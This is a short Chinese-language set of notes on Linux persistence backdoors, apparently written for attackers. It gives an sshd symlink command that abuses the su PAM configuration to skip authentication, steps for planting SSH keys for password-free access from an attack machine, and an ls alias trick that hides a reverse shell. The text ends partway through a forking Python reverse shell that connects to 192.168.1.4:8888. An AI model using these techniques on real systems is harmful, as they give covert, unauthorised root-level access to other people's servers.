sshd软连接后门
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345
在/usr/loacl目录下创建一个su软连接指向sshd,再临时配置此sshd监听的端口为12345,当开启了PAM验证机制的时候,PAM模块则会搜寻PAM相关设定文件,设定文件一般是在/etc/pam.d/,对应pam文件名即为软连接文件名,当我们建立名为su的软连接,即使用了su的pam配置文件,而su的配置文件中有这样一句话 auth sufficient pam_rootok.so
,对uid为0的root用户无条件通过认证。当我们指定端口为12345时,及使用了su的pam的配置文件,无条件通过认证。
免密公钥
ssh-keygen -t rsa
第一次键入保存公私钥的路径,在输入密码时连续两次键入回车即可实现免密的密钥对,将公钥放在对应用户家目录的.ssh,目录下重命名为authorized_keys,将私钥设置为700权限,即可在攻击机上用-i指定私钥从而实现免密登录
alias后门
alias [别名] "[表达式]"
将ls命令替换为反弹shell
-
alias 不支持参数传递,只有函数才支持参数传递,所以需要用函数将ls的参数传递,否则受害者执行带参数的ls会报错
-
传统的反弹shell反弹后终端就无响应了,很容易被发现,所以使用python脚本
import os,socket,subprocess; ret = os.fork() if ret > 0: exit() else: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.1.4", 8888)) os.dup2(s.fileno(), 0) os.dup2(s.fileno